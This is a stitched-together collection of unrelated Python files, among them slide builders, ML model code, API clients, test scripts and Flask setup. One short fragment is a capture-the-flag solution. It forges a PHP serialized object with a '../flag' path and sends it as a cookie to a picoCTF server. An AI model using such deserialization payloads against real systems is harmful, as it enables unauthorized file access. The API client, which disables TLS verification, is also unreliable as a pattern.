'Out of the box, it is easy to change colors, size, and positioning of text, add a caption, do '
'conditional formatting, and draw a bar graph over the cells.'
],
title='Styling Pandas DataFrames'
),
InClassExampleFrame(
[
'I will now go through the next section in '
'"Intro to Pandas and Table Visualization.ipynb"',
'Follow along as I go through the example.',
'This time we are covering the remainder of the notebook starting from "DataFrame Styling"'
],
title='Introduction to Pandas',
block_title='Creating and Using Pandas DataFrames'
),
styling_pandas_lab.presentation_frames(),
],
title='Tables with Pandas DataFrames',
short_title='Pandas'
),
pl.Section(
[
lp.Frame(
[
lp.Block(
[
plot_example_code,
pl.Graphic(images_path('python-salaries-line-graph.pdf'), width=0.5)
],
title=f'Line Graphs using {pd_mono}'
)
],
title='A Minimal Plotting Example'
),
lp.MultiGraphicFrame(
[
images_path('excel-salaries-line-graph.png'),
images_path('python-salaries-line-graph.pdf'),
],
vertical=False,
title='Basic Graph Types: Line Graphs'
),
lp.MultiGraphicFrame(
[
images_path('excel-salaries-bar-graph.png'),
images_path('python-salaries-bar-graph.pdf'),
],
vertical=False,
title='Basic Graph Types: Bar Graphs'
),
lp.MultiGraphicFrame(
[
images_path('excel-salaries-box-whisker-plot.png'),
images_path('python-salaries-box-graph.pdf'),
],
vertical=False,
title='Basic Graph Types: Box and Whisker Plots'
),
InClassExampleFrame(
[
'I will now go through '
'"Intro to Graphics.ipynb"',
'Follow along as I go through the entire example notebook.',
],
title='Introduction to Graphing',
block_title='Graphing Using Pandas'
),
graphing_lab.presentation_frames(),
],
title='Graphing using Pandas',
short_title='Graphs'
),
pl.PresentationAppendix(appendix_frames)
]
DOCUMENT_CLASS_KWARGS = dict(
nav_header=True,
toc_sections=True
)
OUTPUT_NAME = TITLE
|
from django.contrib.gis.db import models
from django.test import ignore_warnings
from django.utils.deprecation import RemovedInDjango50Warning
from ..admin import admin
class City(models.Model):
name = models.CharField(max_length=30)
point = models.PointField()
class Meta:
app_label = "geoadmini_deprecated"
def __str__(self):
return self.name
site = admin.AdminSite(name="admin_gis")
with ignore_warnings(category=RemovedInDjango50Warning):
site.register(City, admin.OSMGeoAdmin)
|
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
from .losses import *
from .modules.layers import *
from .modules.context_module import *
from .modules.attention_module import *
from .modules.decoder_module import *
from .backbones.Res2Net_v1b import res2net50_v1b_26w_4s
class UACANet(nn.Module):
# res2net based encoder decoder
def __init__(self, opt):
super(UACANet, self).__init__()
self.resnet = res2net50_v1b_26w_4s(pretrained=opt.pretrained, output_stride=opt.output_stride)
self.context2 = PAA_e(512, opt.channel)
self.context3 = PAA_e(1024, opt.channel)
self.context4 = PAA_e(2048, opt.channel)
self.decoder = PAA_d(opt.channel)
self.attention2 = UACA(opt.channel * 2, opt.channel)
self.attention3 = UACA(opt.channel * 2, opt.channel)
self.attention4 = UACA(opt.channel * 2, opt.channel)
self.loss_fn = bce_iou_loss
self.ret = lambda x, target: F.interpolate(x, size=target.shape[-2:], mode='bilinear', align_corners=False)
self.res = lambda x, size: F.interpolate(x, size=size, mode='bilinear', align_corners=False)
def forward(self, x, y=None):
base_size = x.shape[-2:]
x = self.resnet.conv1(x)
x = self.resnet.bn1(x)
x = self.resnet.relu(x)
x = self.resnet.maxpool(x)
x1 = self.resnet.layer1(x)
x2 = self.resnet.layer2(x1)
x3 = self.resnet.layer3(x2)
x4 = self.resnet.layer4(x3)
x2 = self.context2(x2)
x3 = self.context3(x3)
x4 = self.context4(x4)
f5, a5 = self.decoder(x4, x3, x2)
out5 = self.res(a5, base_size)
f4, a4 = self.attention4(torch.cat([x4, self.ret(f5, x4)], dim=1), a5)
out4 = self.res(a4, base_size)
f3, a3 = self.attention3(torch.cat([x3, self.ret(f4, x3)], dim=1), a4)
out3 = self.res(a3, base_size)
_, a2 = self.attention2(torch.cat([x2, self.ret(f3, x2)], dim=1), a3)
out2 = self.res(a2, base_size)
if y is not None:
loss5 = self.loss_fn(out5, y)
loss4 = self.loss_fn(out4, y)
loss3 = self.loss_fn(out3, y)
loss2 = self.loss_fn(out2, y)
loss = loss2 + loss3 + loss4 + loss5
else:
loss = 0
return {'pred': out2, 'loss': loss}
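# A minimal usage sketch (an illustration with assumed values, not part of the
# model code): the option object only needs the attributes read above
# (pretrained, output_stride, channel), and the 352x352 input size is arbitrary.
#
#   from types import SimpleNamespace
#   opt = SimpleNamespace(pretrained=False, output_stride=16, channel=32)
#   model = UACANet(opt)
#   images = torch.randn(2, 3, 352, 352)
#   masks = torch.randint(0, 2, (2, 1, 352, 352)).float()
#   out = model(images, masks)   # returns {'pred': ..., 'loss': ...} when masks are given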
|
# -*- coding: utf-8 -*-
import requests
import arrow
from helpers.dictionary import dict_get
from . import logger
from simplejson.errors import JSONDecodeError
# Activate the logger configuration so it also applies to requests & urllib3
logger.apply_config()
class RequestError(RuntimeError):
pass
class Result(object):
def __init__(self, code=200, message='', data=None, timestamp=None):
self.code = code
self.message = message
self.data = data
self.timestamp = arrow.get(timestamp)
def success(self):
return self.code == 200
def failed(self):
return not self.success()
def dot(self, key, default=None):
return dict_get(self.data, key, default) if isinstance(self.data, dict) else default
@property
def raw(self):
return {
'code': self.code,
'message': self.message,
'data': self.data,
'timestamp': self.timestamp.timestamp
}
class ErrorResult(Result):
def __init__(self, message=''):
super(ErrorResult, self).__init__(code=500, message=message)
class OApiClient(object):
_log = logger.get(__name__)
_options = dict(gateway='https://api.my-host.com/api',
appId='CRM',
appKey='XXXXX',
timeout=3,
headers={'Host': 'api.my-host.com'},
verify=False)
    def __init__(self, **kwargs):
        import urllib3
        from requests.adapters import HTTPAdapter
        self._options.update(kwargs)
        # When SSL verification is disabled, silence urllib3's warnings
        # @link https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings
        if not self._options['verify'] and self._options['gateway'].startswith('https'):
            urllib3.disable_warnings()
        # Configure automatic retries, and keep the session so the adapters are actually used
        s = requests.Session()
        r = urllib3.util.Retry(total=3, status_forcelist=[408, 508])
        s.mount('http://', HTTPAdapter(max_retries=r))
        s.mount('https://', HTTPAdapter(max_retries=r))
        self._session = s
def request(self, api, post=None, headers=None):
        '''Send a request to an OApi gateway endpoint'''
if post is None:
post = {}
if headers is None:
headers = {}
post.update({'appId': self._options['appId'],
'appKey': self._options['appKey'],
'operator': 71})
headers.update(self._options['headers'])
kwargs = dict(url='{0}/{1}'.format(self._options['gateway'], api),
data=post,
headers=headers,
timeout=self._options['timeout'],
verify=self._options['verify'])
try:
self._log.info("Request as cURL: %s", self._request_as_curl(kwargs))
            r = self._session.post(**kwargs)
self._log.info("Response: %s", r.content.decode('utf8'))
return Result(**r.json())
except JSONDecodeError:
self._log.warning('JSON decode failed: %s', r.content.decode('utf8'))
return ErrorResult('JSON decode failed')
except BaseException as err:
self._log.warning('Request failed: %s', err)
return ErrorResult("Request failed: %s" % err)
def _request_as_curl(self, d):
        '''Render the request as a curl command line for easier debugging'''
        parts = ["curl '%s'" % d['url']]
        if d['url'].startswith('https') and not d['verify']:
            parts.append('-k')
if d['data']:
parts.append("-d '%s'" % '&'.join(['%s=%s' % (k, v) for (k, v) in d['data'].items()]))
if d['headers']:
parts.append(' '.join("-H '%s: %s'" % (k, v) for (k, v) in d['headers'].items()))
if d['timeout']:
parts.append('--connect-timeout %d' % d['timeout'])
return ' '.join(parts)
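# A minimal usage sketch (hedged: the endpoint path, payload, and credentials are
# made up; real values would come from configuration):
#
#   client = OApiClient(appId='CRM', appKey='XXXXX')
#   result = client.request('customer/detail', post={'customerId': 42})
#   if result.success():
#       print(result.dot('name'))
#   else:
#       print(result.code, result.message)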
|
'''
@author: MengLai
'''
import os
import tempfile
import uuid
import time
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_lib as test_lib
import zstackwoodpecker.test_state as test_state
import zstackwoodpecker.operations.resource_operations as res_ops
import zstackwoodpecker.operations.console_operations as cons_ops
import zstackwoodpecker.operations.scenario_operations as sce_ops
import zstacklib.utils.ssh as ssh
test_stub = test_lib.lib_get_test_stub()
test_obj_dict = test_state.TestStateDict()
tmp_file = '/tmp/%s' % uuid.uuid1().get_hex()
zstack_management_ip = os.environ.get('zstackManagementIp')
vm_inv = None
def create_vm(image):
l3_name = os.environ.get('l3PublicNetworkName')
l3_net_uuid = test_lib.lib_get_l3_by_name(l3_name).uuid
image_uuid = image.uuid
vm_name = 'zs_install_%s' % image.name
    vm_instance_offering_uuid = os.environ.get('instanceOfferingUuid')
    vm_creation_option = test_util.VmOption()
    vm_creation_option.set_instance_offering_uuid(vm_instance_offering_uuid)
vm_creation_option.set_l3_uuids([l3_net_uuid])
vm_creation_option.set_image_uuid(image_uuid)
vm_creation_option.set_name(vm_name)
vm_inv = sce_ops.create_vm(zstack_management_ip, vm_creation_option)
return vm_inv
def test():
global vm_inv
iso_path = os.environ.get('iso_path')
upgrade_script_path = os.environ.get('upgradeScript')
test_util.test_dsc('Create test vm to test zstack installation with console proxy.')
conditions = res_ops.gen_query_conditions('name', '=', os.environ.get('imageNameBase_zstack'))
image = res_ops.query_resource(res_ops.IMAGE, conditions)[0]
vm_inv = create_vm(image)
time.sleep(60)
vm_ip = vm_inv.vmNics[0].ip
vip = '172.20.61.253'
if vip == vm_ip:
vip = '172.20.61.254'
ssh_cmd = 'ssh -oStrictHostKeyChecking=no -oCheckHostIP=no -oUserKnownHostsFile=/dev/null %s' % vm_ip
ssh.make_ssh_no_password(vm_ip, test_lib.lib_get_vm_username(vm_inv), test_lib.lib_get_vm_password(vm_inv))
cmd = '%s ifconfig eth0:0 %s up' % (ssh_cmd, vip)
process_result = test_stub.execute_shell_in_process(cmd, tmp_file)
test_stub.update_iso(vm_ip, tmp_file, iso_path, upgrade_script_path)
target_file = '/root/zstack-all-in-one.tgz'
test_stub.prepare_test_env(vm_inv, target_file)
args = '-o -C %s -I %s' % (vip, vm_ip)
test_stub.execute_install_with_args(ssh_cmd, args, target_file, tmp_file)
test_stub.check_installation(vm_ip, tmp_file)
cmd = '%s cat /usr/local/zstack/apache-tomcat/webapps/zstack/WEB-INF/classes/zstack.properties | grep \'consoleProxyOverriddenIp = %s\'' % (ssh_cmd, vip)
(process_result, check_result) = test_stub.execute_shell_in_process_stdout(cmd, tmp_file)
check_result = check_result[:-1]
test_util.test_dsc('cat result: |%s|' % check_result)
expect_result = "consoleProxyOverriddenIp = %s" % vip
if check_result != expect_result:
test_util.test_fail('Fail to install ZStack with console proxy')
os.system('rm -f %s' % tmp_file)
sce_ops.destroy_vm(zstack_management_ip, vm_inv.uuid)
test_util.test_pass('ZStack installation Test Success')
#Will be called only if exception happens in test().
def error_cleanup():
global vm_inv
os.system('rm -f %s' % tmp_file)
sce_ops.destroy_vm(zstack_management_ip, vm_inv.uuid)
test_lib.lib_error_cleanup(test_obj_dict)
|
# There is a problem with quota enforcement in swift client.....
# https://github.com/openstack/python-swiftclient/blob/e65070964c7b1e04119c87e5f344d39358780d18/swiftclient/service.py#L2235
# content-length is only set if we upload a local file from a path on the file system.....
# any other source takes the other code path, where content-length gets set to None.
# Additionally, swiftclient.utils.LengthWrapper tests if a stream is seekable,
# however this test fails on a non-seekable io.BufferedReader, because it checks
# just for 'seek' attribute availability instead of calling 'seekable' on io.XXX object.
# There are probably a couple of ways to fix this:
# - patch as it is (requires user to wrap file like object in LengthWrapper)
# - respect 'Content-Length' header option (may require this code to wrap
# file like object in LengthWrapper if content-length is available,
# because my file-like object doesn't close automatically, even if there is no more data incoming)
# Use case:
# pass web request.body_file on directly to swift. This body_file doesn't get closed by the client,
# so we need some iterator that stops after content-length bytes. (ReadableIterator doesn't work here,
# and will hang forever waiting for more bytes.)
# Patch it here for our use case only...
from errno import ENOENT
from os.path import (
getmtime, getsize
)
from time import time
from six import text_type
from six.moves.urllib.parse import quote
from swiftclient.utils import (
config_true_value, ReadableToIterable, LengthWrapper,
report_traceback
)
from swiftclient.exceptions import ClientException
from swiftclient.service import (
logger, split_headers, interruptable_as_completed,
DISK_BUFFER, SwiftError
)
from swiftclient.service import SwiftService
def _upload_object_job(self, conn, container, source, obj, options,
results_queue=None):
if obj.startswith('./') or obj.startswith('.\\'):
obj = obj[2:]
if obj.startswith('/'):
obj = obj[1:]
res = {
'action': 'upload_object',
'container': container,
'object': obj
}
if hasattr(source, 'read'):
stream = source
path = None
else:
path = source
res['path'] = path
try:
if path is not None:
put_headers = {'x-object-meta-mtime': "%f" % getmtime(path)}
else:
put_headers = {'x-object-meta-mtime': "%f" % round(time())}
res['headers'] = put_headers
# We need to HEAD all objects now in case we're overwriting a
# manifest object and need to delete the old segments
# ourselves.
old_manifest = None
old_slo_manifest_paths = []
new_slo_manifest_paths = set()
segment_size = int(0 if options['segment_size'] is None
else options['segment_size'])
if (options['changed'] or options['skip_identical']
or not options['leave_segments']):
try:
headers = conn.head_object(container, obj)
is_slo = config_true_value(
headers.get('x-static-large-object'))
if options['skip_identical'] or (
is_slo and not options['leave_segments']):
chunk_data = self._get_chunk_data(
conn, container, obj, headers)
if options['skip_identical'] and self._is_identical(
chunk_data, path):
res.update({
'success': True,
'status': 'skipped-identical'
})
return res
cl = int(headers.get('content-length'))
mt = headers.get('x-object-meta-mtime')
if (path is not None and options['changed']
and cl == getsize(path)
and mt == put_headers['x-object-meta-mtime']):
res.update({
'success': True,
'status': 'skipped-changed'
})
return res
if not options['leave_segments']:
old_manifest = headers.get('x-object-manifest')
if is_slo:
for old_seg in chunk_data:
seg_path = old_seg['name'].lstrip('/')
if isinstance(seg_path, text_type):
seg_path = seg_path.encode('utf-8')
old_slo_manifest_paths.append(seg_path)
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
# Merge the command line header options to the put_headers
put_headers.update(split_headers(
options['meta'], 'X-Object-Meta-'))
put_headers.update(split_headers(options['header'], ''))
# Don't do segment job if object is not big enough, and never do
# a segment job if we're reading from a stream - we may fail if we
# go over the single object limit, but this gives us a nice way
# to create objects from memory
if (path is not None and segment_size
and (getsize(path) > segment_size)):
res['large_object'] = True
seg_container = container + '_segments'
if options['segment_container']:
seg_container = options['segment_container']
full_size = getsize(path)
segment_futures = []
segment_pool = self.thread_manager.segment_pool
segment = 0
segment_start = 0
while segment_start < full_size:
if segment_start + segment_size > full_size:
segment_size = full_size - segment_start
if options['use_slo']:
segment_name = '%s/slo/%s/%s/%s/%08d' % (
obj, put_headers['x-object-meta-mtime'],
full_size, options['segment_size'], segment
)
else:
segment_name = '%s/%s/%s/%s/%08d' % (
obj, put_headers['x-object-meta-mtime'],
full_size, options['segment_size'], segment
)
seg = segment_pool.submit(
self._upload_segment_job, path, container,
segment_name, segment_start, segment_size, segment,
obj, options, results_queue=results_queue
)
segment_futures.append(seg)
segment += 1
segment_start += segment_size
segment_results = []
errors = False
exceptions = []
for f in interruptable_as_completed(segment_futures):
try:
r = f.result()
if not r['success']:
errors = True
segment_results.append(r)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
errors = True
exceptions.append((err, traceback, err_time))
if errors:
err = ClientException(
'Aborting manifest creation '
'because not all segments could be uploaded. %s/%s'
% (container, obj))
res.update({
'success': False,
'error': err,
'exceptions': exceptions,
'segment_results': segment_results
})
return res
res['segment_results'] = segment_results
if options['use_slo']:
response = self._upload_slo_manifest(
conn, segment_results, container, obj, put_headers)
res['manifest_response_dict'] = response
new_slo_manifest_paths = {
seg['segment_location'] for seg in segment_results}
else:
new_object_manifest = '%s/%s/%s/%s/%s/' % (
quote(seg_container.encode('utf8')),
quote(obj.encode('utf8')),
put_headers['x-object-meta-mtime'], full_size,
options['segment_size'])
if old_manifest and old_manifest.rstrip('/') == \
new_object_manifest.rstrip('/'):
old_manifest = None
put_headers['x-object-manifest'] = new_object_manifest
mr = {}
conn.put_object(
container, obj, '', content_length=0,
headers=put_headers,
response_dict=mr
)
res['manifest_response_dict'] = mr
elif options['use_slo'] and segment_size and not path:
segment = 0
results = []
while True:
segment_name = '%s/slo/%s/%s/%08d' % (
obj, put_headers['x-object-meta-mtime'],
segment_size, segment
)
seg_container = container + '_segments'
if options['segment_container']:
seg_container = options['segment_container']
ret = self._upload_stream_segment(
conn, container, obj,
seg_container,
segment_name,
segment_size,
segment,
put_headers,
stream
)
if not ret['success']:
return ret
if (ret['complete'] and segment == 0) or\
ret['segment_size'] > 0:
results.append(ret)
if results_queue is not None:
# Don't insert the 0-sized segments or objects
# themselves
if ret['segment_location'] != '/%s/%s' % (
container, obj) and ret['segment_size'] > 0:
results_queue.put(ret)
if ret['complete']:
break
segment += 1
if results[0]['segment_location'] != '/%s/%s' % (
container, obj):
response = self._upload_slo_manifest(
conn, results, container, obj, put_headers)
res['manifest_response_dict'] = response
new_slo_manifest_paths = {
r['segment_location'] for r in results}
res['large_object'] = True
else:
res['response_dict'] = ret
res['large_object'] = False
else:
res['large_object'] = False
obr = {}
fp = None
try:
if path is not None:
content_length = getsize(path)
fp = open(path, 'rb', DISK_BUFFER)
contents = LengthWrapper(fp,
content_length,
md5=options['checksum'])
# TODO: patch here ... check if stream is already a LengthWrapper,
# and use it.
elif isinstance(stream, LengthWrapper):
content_length = stream._length
contents = stream
# TODO: patch end
else:
content_length = None
contents = ReadableToIterable(stream,
md5=options['checksum'])
etag = conn.put_object(
container, obj, contents,
content_length=content_length, headers=put_headers,
response_dict=obr
)
res['response_dict'] = obr
if (options['checksum'] and
etag and etag != contents.get_md5sum()):
raise SwiftError(
'Object upload verification failed: '
'md5 mismatch, local {0} != remote {1} '
'(remote object has not been removed)'
.format(contents.get_md5sum(), etag))
finally:
if fp is not None:
fp.close()
if old_manifest or old_slo_manifest_paths:
drs = []
delobjsmap = {}
if old_manifest:
scontainer, sprefix = old_manifest.split('/', 1)
sprefix = sprefix.rstrip('/') + '/'
delobjsmap[scontainer] = []
for part in self.list(scontainer, {'prefix': sprefix}):
if not part["success"]:
raise part["error"]
delobjsmap[scontainer].extend(
seg['name'] for seg in part['listing'])
if old_slo_manifest_paths:
for seg_to_delete in old_slo_manifest_paths:
if seg_to_delete in new_slo_manifest_paths:
continue
scont, sobj = \
seg_to_delete.split(b'/', 1)
delobjs_cont = delobjsmap.get(scont, [])
delobjs_cont.append(sobj)
delobjsmap[scont] = delobjs_cont
del_segs = []
for dscont, dsobjs in delobjsmap.items():
for dsobj in dsobjs:
del_seg = self.thread_manager.segment_pool.submit(
self._delete_segment, dscont, dsobj,
results_queue=results_queue
)
del_segs.append(del_seg)
for del_seg in interruptable_as_completed(del_segs):
drs.append(del_seg.result())
res['segment_delete_results'] = drs
# return dict for printing
res.update({
'success': True,
'status': 'uploaded',
'attempts': conn.attempts})
return res
except OSError as err:
traceback, err_time = report_traceback()
logger.exception(err)
if err.errno == ENOENT:
error = SwiftError('Local file %r not found' % path, exc=err)
else:
error = err
res.update({
'success': False,
'error': error,
'traceback': traceback,
'error_timestamp': err_time
})
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
SwiftService._upload_object_job = _upload_object_job
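# A usage sketch for the patch above (hedged: the container and object names are
# illustrative, and the caller is assumed to know the body's content length, e.g.
# from the request's Content-Length header). The point is that a stream wrapped
# in LengthWrapper keeps an explicit length, so the patched job sends a real
# content-length instead of falling back to a chunked upload.
from swiftclient.service import SwiftUploadObject

def upload_request_body(body_file, content_length, container='incoming', object_name='request-body'):
    wrapped = LengthWrapper(body_file, content_length, md5=False)
    with SwiftService() as swift:
        for res in swift.upload(container, [SwiftUploadObject(wrapped, object_name=object_name)]):
            if not res['success']:
                raise res['error']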
|
import requests
import base64
obj_ = b'O:10:"access_log":1:{s:8:"log_file";s:7:"../flag";}'
obj_encoded = base64.b64encode(obj_).decode()
print(obj_encoded)
cookie = {
"login": obj_encoded
}
r = requests.get("http://mercury.picoctf.net:14804/authentication.php", cookies=cookie)
print(r.content.decode())
|
class RepoStoreFactory:
""" the repo stores factory
The factory is used to create Repo handlers
"""
@staticmethod
def get_repo_stores():
""" return a list of supported repo handlers
Returns:
list of str -- the list of supported handlers
"""
return ['disk_handler', 'git_handler', 'memory_handler']
@staticmethod
def get(repo_store_type, **kwargs):
""" this method returns a handler of the specified type
This method is used to construct handler of the specified type using the provided arguments.
Currently these types are supported:
* disk_handler
* git_handler
* memory_handler
Args:
repo_store_type (str): the name of the repo store type
Raises:
Exception: raises an exception if the type is not supported
Returns:
RepoStore -- the constructed handler
"""
if repo_store_type == 'disk_handler':
from pailab.ml_repo.disk_handler import RepoObjectDiskStorage
return RepoObjectDiskStorage(**kwargs)
elif repo_store_type == 'git_handler':
from pailab.ml_repo.git_handler import RepoObjectGitStorage
return RepoObjectGitStorage(**kwargs)
elif repo_store_type == 'memory_handler':
from pailab.ml_repo.memory_handler import RepoObjectMemoryStorage
return RepoObjectMemoryStorage()
raise Exception('Cannot create RepoStore: Unknown repo type ' + repo_store_type +
'. Use only types from the list returned by RepoStoreFactory.get_repo_stores().')
class NumpyStoreFactory:
""" class to construct a numpy store for big data
"""
@staticmethod
def get_numpy_stores():
""" this method returns the supported types
Returns:
list of str -- list of supported big data handler types
"""
return ['memory_handler', 'hdf_handler', 'hdf_remote_handler']
@staticmethod
def get(numpy_store_type, **kwargs):
""" this method returns a handler of the specified type for handling big data
This method is used to construct a big data handler of the specified type using the provided arguments.
Currently these types are supported:
* memory_handler
* hdf_handler
Args:
numpy_store_type (str): the name of the big data store type
Raises:
Exception: raises an exception if the type is not supported
Returns:
NumpyStore -- the constructed handler
"""
if numpy_store_type == 'memory_handler':
from pailab.ml_repo.memory_handler import NumpyMemoryStorage
return NumpyMemoryStorage(**kwargs)
elif numpy_store_type == 'hdf_handler':
from pailab.ml_repo.numpy_handler_hdf import NumpyHDFStorage
return NumpyHDFStorage(**kwargs)
elif numpy_store_type == 'hdf_remote_handler':
from pailab.ml_repo.numpy_handler_hdf import NumpyHDFRemoteStorage
return NumpyHDFRemoteStorage(**kwargs)
raise Exception('Cannot create NumpyStore: Unknown type ' + numpy_store_type +
'. Use only types from the list returned by NumpyStoreFactory.get_numpy_stores().')
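# A minimal usage sketch (hedged: only the in-memory handlers are shown because
# they need no constructor arguments; the other handlers take handler-specific
# keyword arguments that are forwarded via **kwargs):
#
#   repo_store = RepoStoreFactory.get('memory_handler')
#   numpy_store = NumpyStoreFactory.get('memory_handler')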
|
import yaml
def load_twilio_creds(file):
with open(file) as fp:
auth = yaml.load(fp, Loader=yaml.FullLoader)
return auth
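# Illustrative usage (a minimal sketch; the file name and keys below are hypothetical,
# not defined by this module):
#
#   creds = load_twilio_creds('twilio_creds.yaml')   # e.g. a YAML file with account_sid / auth_token keys
#   print(sorted(creds.keys()))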
|
import datetime
import json
import logging
import os
import socket
import traceback
import types
from exceptions.exceptions import ServerException
from exceptions.send_alert import send_dingding_alert
from logging.config import dictConfig
from typing import Any, Dict, Tuple, Union
from flask import Flask, request
from flask_cors import CORS
from werkzeug.exceptions import HTTPException
from blueprints import all_blueprints
from configures import settings
from models.base_model import BaseModel
from models.database_models import db
from resources import ApiResponse
logger = logging.getLogger(__name__)
class JsonEncoder(json.JSONEncoder):
def default(self, value) -> Any:
if isinstance(value, (datetime.datetime, datetime.date)):
return value.strftime("%Y-%m-%d %H:%M:%S")
if isinstance(value, ApiResponse):
return value.get()
if isinstance(value, BaseModel):
return value.marshal()
if isinstance(value, types.GeneratorType):
return [self.default(v) for v in value]
return json.JSONEncoder.default(self, value)
def create_app() -> Flask:
app = Flask(__name__)
CORS(app, supports_credentials=True)
init_config(app)
app.json_encoder = JsonEncoder
return app
def init_config(app) -> None:
app.config["SQLALCHEMY_DATABASE_URI"] = settings.SQLALCHEMY_DATABASE_URI
app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = settings.SQLALCHEMY_TRACK_MODIFICATIONS
app.config['SECRET_KEY'] = settings.SECRET_KEY
register_blueprints(app)
app.register_error_handler(Exception, handle_exception)
db.init_app(app)
return
def register_blueprints(app) -> None:
for blueprint in all_blueprints:
app.register_blueprint(blueprint)
return
def handle_exception(e) -> Tuple[Dict[str, Union[Union[int, str, list], Any]], Union[int, Any]]:
code = 500
if isinstance(e, (HTTPException, ServerException)):
code = e.code
logger.exception(e)
exc = traceback.format_exc(limit=10).split("\n")
if str(code) == "500":
send_dingding_alert(request.url, request.args, request.json, repr(e), exc)
return {'error_code': code, 'error_msg': str(e), 'traceback': exc}, code
def init_logging() -> None:
level = 'INFO' if settings.NAMESPACE == 'PRODUCTION' else 'DEBUG'
dir_name = "./logs/{}".format(socket.gethostname())
if not os.path.exists(dir_name):
os.makedirs(dir_name)
config = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'brief': {'format': '%(message)s'},
'standard': {
'format': '[%(asctime)s] [%(levelname)s] [%(filename)s.%(funcName)s:%(lineno)3d] [%(process)d::%(thread)d] %(message)s'
},
},
'handlers': {
'default': {
'level': level,
'formatter': 'standard',
'class': 'logging.handlers.TimedRotatingFileHandler',
'filename': '{}/server.log'.format(dir_name),
'when': 'midnight',
'interval': 1,
'encoding': 'utf8',
},
'console': {'level': level, 'formatter': 'standard', 'class': 'logging.StreamHandler'},
'default_access': {
'level': level,
'formatter': 'brief',
'class': 'logging.handlers.TimedRotatingFileHandler',
'filename': '{}/access.log'.format(dir_name),
'when': 'midnight',
'interval': 1,
'encoding': 'utf8',
},
'console_access': {
'level': level,
'formatter': 'brief',
'class': 'logging.StreamHandler',
},
},
'loggers': {
'werkzeug': {
'handlers': ['default_access', 'console_access'],
'level': level,
'propagate': False,
},
'': {'handlers': ['default', 'console'], 'level': level, 'propagate': True},
},
}
def patch_wsgi_handler():
"""
忽略WSGIServer log标签
"""
from gevent.pywsgi import WSGIHandler
logger = logging.getLogger('werkzeug')
def log_request(self):
logger.info(WSGIHandler.format_request(self))
WSGIHandler.log_request = log_request
dictConfig(config)
patch_wsgi_handler()
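# Illustrative entry point (a minimal sketch, not part of the original module):
# init_logging() applies the dictConfig built above, create_app() wires CORS, the
# blueprints, the JSON encoder and the error handler. Host and port are placeholders.
if __name__ == "__main__":
    init_logging()
    app = create_app()
    app.run(host="0.0.0.0", port=8000, debug=False)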
|
network_analytics_fields = {
"report": {
"report_type": "network_analytics",
"report_interval": "last_30_days",
"columns": [
"hour",
"insertion_order_id",
"line_item_id",
"campaign_id",
"advertiser_id",
"pixel_id",
"imps",
"imps_viewed",
"clicks",
"cost",
"cpm",
"cpm_including_fees",
"revenue",
"revenue_including_fees",
"total_convs",
"geo_country"
],
"filters": [{"geo_country": "FR"}],
"groups": ["advertiser_id", "hour"],
"format": "csv"
}
}
segment_load_fields = {
"report": {
"report_type": "segment_load",
"columns": ["segment_id",
"segment_name",
"month",
"total_loads",
"monthly_uniques",
"avg_daily_uniques"],
"format": "csv",
"report_interval": "month_to_date",
"groups": ["segment_id", "month"],
"orders": ["month"],
}}
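# Illustrative sketch (hypothetical endpoint and token; the real report service URL
# and auth scheme are not defined in this file). The dicts above are intended to be
# sent as JSON bodies when requesting a report, e.g.:
#
#   import requests
#   resp = requests.post("https://api.example.com/report",                    # hypothetical URL
#                        json=network_analytics_fields,
#                        headers={"Authorization": "Bearer <token-placeholder>"})
#   report_id = resp.json().get("response", {}).get("report_id")              # assumed response shape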
|
# Generated by Django 3.2.3 on 2021-05-31 16:46
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('csiapp', '0003_auto_20210531_2052'),
]
operations = [
migrations.AlterField(
model_name='event',
name='end_date',
field=models.CharField(blank=True, max_length=200),
),
migrations.AlterField(
model_name='event',
name='start_date',
field=models.CharField(blank=True, max_length=200),
),
]
|
import random
def ChangeNumber(num):
table = '0123456789abcdefghijklmnopqrstuvwxyz'
result = []
temp = num
if 0 == temp:
result.append('0')
else:
while 0 < temp:
result.append(table[temp % 36])
temp //= 36
return ''.join(reversed(result))
def get_callback():
callback_ = "bd__cbs__" + ChangeNumber(int(random.random() * 2147483648))
return callback_
def get_callback_p():
callback_ = "parent.bd__pcbs__" + ChangeNumber(int(random.random() * 2147483648))
return callback_
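# Illustrative usage (a minimal sketch): ChangeNumber converts a non-negative integer
# to base-36, and the helpers wrap a random base-36 value in a JSONP-style callback name.
if __name__ == '__main__':
    print(ChangeNumber(36))     # '10'
    print(get_callback())       # e.g. 'bd__cbs__<random base-36 string>'
    print(get_callback_p())     # e.g. 'parent.bd__pcbs__<random base-36 string>'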
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import time
from werkzeug.utils import secure_filename
#allow jpg png for moment upload
ALLOWED_MOMENT = set(['png', 'jpg', 'jpeg'])
def allowedMoment(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1].lower() in ALLOWED_MOMENT
#upload moment in edit page
#return 2 for empty or disallowed file
#return 1 for save error
#return file name for success
def momentImage(file, petId):
if file.filename == '':
return '2'
if file and allowedMoment(file.filename):
#build a unique file name from the current timestamp
fileName = str(time.time()).replace('.', '-') + '.' + secure_filename(file.filename)
#store into pet id folder
foldPath = '../static/img/pet/' + str(petId) + '/moment/'
#create folder path if not exist
dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), foldPath)
if not os.path.exists(dir):
os.makedirs(dir)
try:
file.save(os.path.join(dir, fileName))
except Exception as err:
print('Something went wrong: {}'.format(err))
return '1'
#return filename for success
return fileName
#file type not allowed: return 2
else:
return '2'
#allow jpg for user profile
ALLOWED_USER = set(['jpg'])
def allowedUser(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1].lower() in ALLOWED_USER
#upload user profile in edit panel
#return 2 for invalid file
#return 1 for success
#return 0 for error
def userAvatar(file, userId):
if file and allowedUser(file.filename):
fileName = str(userId) + '.jpg'
foldPath = '../static/img/user/'
#create folder path if not exist
